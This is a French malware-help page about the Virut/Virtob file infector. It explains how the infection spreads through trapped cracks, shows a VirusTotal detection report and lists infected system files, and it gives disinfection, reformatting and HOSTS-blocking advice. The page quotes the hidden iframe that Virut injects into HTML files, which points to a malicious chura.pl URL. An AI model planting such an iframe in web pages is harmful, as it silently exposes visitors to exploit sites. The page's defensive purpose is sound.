Méthode de propagation
Découvert le 18 septembre 2007, ce dernier se propage via des cracks piégés disponibles depuis des sites "fakes"
Comme vous pouvez le constater, les cracks sont encore utilisés pour propager des infections, voir le sujet Le danger des cracks!.
Voici la vidéo illustrative :
Ci-joint le taux de détection d'un des fichiers du crack à une date donnée - vous en tirez vos propres conclusions :
Il est bien entendu possible de récupérer l'infection par un ami, ce dernier vous envoyant un fichier exécutable infecté.File install.exe received on 2009.11.22 18:05:43 (UTC)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 11/41 (26.83%)
Antivirus Version Last Update Result
a-squared 4.5.0.41 2009.11.22 Virus.Win32.Virut!IK
AhnLab-V3 5.0.0.2 2009.11.20 -
AntiVir 7.9.1.72 2009.11.22 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2009.11.20 -
Authentium 5.2.0.5 2009.11.22 -
Avast 4.8.1351.0 2009.11.22 -
AVG 8.5.0.425 2009.11.22 -
BitDefender 7.2 2009.11.22 -
CAT-QuickHeal 10.00 2009.11.21 (Suspicious) - DNAScan
ClamAV 0.94.1 2009.11.22 -
Comodo 2999 2009.11.22 -
DrWeb 5.0.0.12182 2009.11.22 -
eSafe 7.0.17.0 2009.11.19 -
eTrust-Vet 35.1.7133 2009.11.20 -
F-Prot 4.5.1.85 2009.11.22 -
F-Secure 9.0.15370.0 2009.11.20 -
Fortinet 3.120.0.0 2009.11.22 -
GData 19 2009.11.22 -
Ikarus T3.1.1.74.0 2009.11.22 Virus.Win32.Virut
Jiangmin 11.0.800 2009.11.22 -
K7AntiVirus 7.10.901 2009.11.20 -
Kaspersky 7.0.0.125 2009.11.22 -
McAfee 5810 2009.11.22 -
McAfee+Artemis 5810 2009.11.22 Artemis!69E260EDEBD5
McAfee-GW-Edition 6.8.5 2009.11.22 Heuristic.LooksLike.Win32.SuspiciousPE.B!87
Microsoft 1.5302 2009.11.22 Virus:Win32/Virut.gen!O
NOD32 4627 2009.11.21 -
Norman 6.03.02 2009.11.21 W32/Obfuscated.EA
nProtect 2009.1.8.0 2009.11.22 -
Panda 10.0.2.2 2009.11.22 -
PCTools 7.0.3.5 2009.11.22 -
Prevx 3.0 2009.11.22 -
Rising 22.22.06.04 2009.11.22 -
Sophos 4.47.0 2009.11.22 Sus/UnkPack-C
Sunbelt 3.2.1858.2 2009.11.22 LooksLike.Win32.InfectedFile!A (v)
Symantec 1.4.4.12 2009.11.22 -
TheHacker 6.5.0.2.075 2009.11.20 -
TrendMicro 9.0.0.1003 2009.11.22 Possible_Virus
VBA32 3.12.12.0 2009.11.22 -
ViRobot 2009.11.20.2047 2009.11.20 -
VirusBuster 5.0.21.0 2009.11.22 -
Additional information
File size: 24177 bytes
MD5...: 69e260edebd58f21e3db57f43ce2d6ac
SHA1..: 2ef22c22a82f188827ac58f0eaa97a8ddaaefe41
Vous pouvez aussi contracter l'infection via des Exploit sur site Web puisque Virut/Virtob modifie aussi tous les fichiers html de l'ordinateur infecté pour y insérer une iframe :
Code : Tout sélectionner
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>Désinfection...
Virut se propage très rapidement sur le système... Ce qui fait qu'il est très difficile de désinfecter ce dernier...
Un scan en ligne par exemple chez Kaspersky permet de confirmer ou non l'infection sur le système.
On se retrouve vite via des scans en ligne avec une série de fichiers infectés.
Si le nombre de fichiers infectés est minimale et si peu de fichiers systèmes (répertoire Windows et System32) sont touchés, vous pouvez tenter la désinfection :NIRCMD.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
notepad.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
regedit.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
sed.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
SWREG.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
SWSC.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
TASKMAN.EXE;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
twunk_32.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
vFind.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
winhlp32.exe;C:\WINDOWS;Win32.Virut.56;Désinfecté.;
spuninst.exe;C:\WINDOWS\$hf_mig$\KB885250;Win32.Virut.56;Désinfecté.;
update.exe;C:\WINDOWS\$hf_mig$\KB885250\update;Win32.Virut.56;Désinfecté.;
spuninst.exe;C:\WINDOWS\$hf_mig$\KB885835;Win32.Virut.56;Désinfecté.;
update.exe;C:\WINDOWS\$hf_mig$\KB885835\update;Win32.Virut.56;Désinfecté.;
spuninst.exe;C:\WINDOWS\$hf_mig$\KB885836;Win32.Virut.56;Désinfecté.;
update.exe;C:\WINDOWS\$hf_mig$\KB885836\update;Win32.Virut.56;Désinfecté.;
spuninst.exe;C:\WINDOWS\$hf_mig$\KB887472;Win32.Virut.56;Désinfecté.;
msmsgs.exe;C:\WINDOWS\$hf_mig$\KB887472\SP2QFE;Win32.Virut.56;Désinfecté.;
update.exe;C:\WINDOWS\$hf_mig$\KB887472\update;Win32.Virut.56;Désinfecté.;
spuninst.exe;C:\WINDOWS\$hf_mig$\KB887742;Win32.Virut.56;Désinfecté.;
update.exe;C:\WINDOWS\$hf_mig$\KB887742\update;Win32.Virut.56;Désinfecté.;
ERDNT.EXE;C:\WINDOWS\ERDNT\Hiv-backup;Win32.Virut.56;Désinfecté.;
ERDNT.EXE;C:\WINDOWS\ERDNT\subs;Win32.Virut.56;Désinfecté.;
places.exe;C:\WINDOWS\Installer\{350C940c-3D7C-4EE8-BAA9-00BCB3D54227};Win32.Virut.56;Désinfecté.;
agentsvr.exe;C:\WINDOWS\msagent;Win32.Virut.56;Désinfecté.;
HelpCtr.exe;C:\WINDOWS\pchealth\helpctr\binaries;Win32.Virut.56;Désinfecté.;
HelpHost.exe;C:\WINDOWS\pchealth\helpctr\binaries;Win32.Virut.56;Désinfecté.;
HelpSvc.exe;C:\WINDOWS\pchealth\helpctr\binaries;Win32.Virut.56;Désinfecté.;
HscUpd.exe;C:\WINDOWS\pchealth\helpctr\binaries;Win32.Virut.56;Désinfecté.;
notiflag.exe;C:\WINDOWS\pchealth\helpctr\binaries;Win32.Virut.56;Désinfecté.;
accwiz.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
calc.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
charmap.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
cleanmgr.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
conime.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
cscript.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
diskperf.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
dvdupgrd.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
findstr.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
freecell.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
ipconfig.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
magnify.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
mmc.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
mobsync.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
mshearts.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
mspaint.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
mstsc.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
net1.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
notepad.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
ntbackup.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
odbcad32.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
osk.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
ping.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
qprocess.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
rcimlby.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
route.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
runonce.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
setup.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
sndrec32.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
sndvol32.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
sol.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
sort.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
spider.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
taskmgr.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
tcmsetup.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
tsshutdn.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
typeperf.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
utilman.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
winhlp32.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
winmine.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
wscript.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
wuauclt1.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
wupdmgr.exe;C:\WINDOWS\system32;Win32.Virut.56;Désinfecté.;
comrepl.exe;C:\WINDOWS\system32\Com;Win32.Virut.56;Désinfecté.;
comrereg.exe;C:\WINDOWS\system32\Com;Win32.Virut.56;Désinfecté.;
ctfmon.exe;C:\WINDOWS\system32\dllcache;Win32.Virut.56;Désinfecté.;
spoolsv.exe;C:\WINDOWS\system32\dllcache;Win32.Virut.56;Désinfecté.;
svchost.exe;C:\WINDOWS\system32\dllcache;Win32.Virut.56;Désinfecté.;
userinit.exe;C:\WINDOWS\system32\dllcache;Win32.Virut.56;Désinfecté.;
rstrui.exe;C:\WINDOWS\system32\Restore;Win32.Virut.56;Désinfecté.;
migwiz.exe;C:\WINDOWS\system32\usmt;Win32.Virut.56;Désinfecté.;
wmiprvse.exe;C:\WINDOWS\system32\wbem;Win32.Virut.56;Désinfecté.;
- Soit avec le CD Live Dr.Web
- Soit en suivant la procédure de cette page : https://www.malekal.com/Win32:virut.php
De plus si les fichiers systèmes Windows sont touchés, il est conseillé de formater d'autant plus que vous pouvez passer des heures à tenter de désinfecter votre système pour au final avoir des dommages colatéraux (réseau qui ne fonctionne plus etc). :
Afin de ne pas se faire réinfecter suite au formatage vous devez suivre les indications suivantes :
- ne garder aucun fichier exécutable. Si vous gardez un fichier exécutable infecté par Virut et que vous l'exécutez après le formatage vous allez réinfecter l'ordinateur.
- ne retélécharger pas de cracks après le formatage sinon vous allez réinfecter à nouveau votre ordinateur.
Juste après le formatage, il peut-être conseillé de rajouter ces deux lignes sur ton fichier HOSTS Windows (voir https://www.malekal.com/windows_fichier_host.php ) :
Attention aux medias amovibles et partitions secondaires :127.0.0.1 brenz.pl
127.0.0.1 chura.pl
Une fois le système formaté, faites attention aux partitions secondaires, clef USB et disque dur externe, vous pouvez avoir infecté des fichiers dans ces médias... si vous réexecutez un de ces fichiers, vous remettez l'infection sur votre système.
Scannez donc ces médias avant toute exécution de fichiers.
Si vous avez un doute sur un fichier exécutable, scannez le sur VirusTotal, après l'exécution de ce dernier, ce sera trop tard!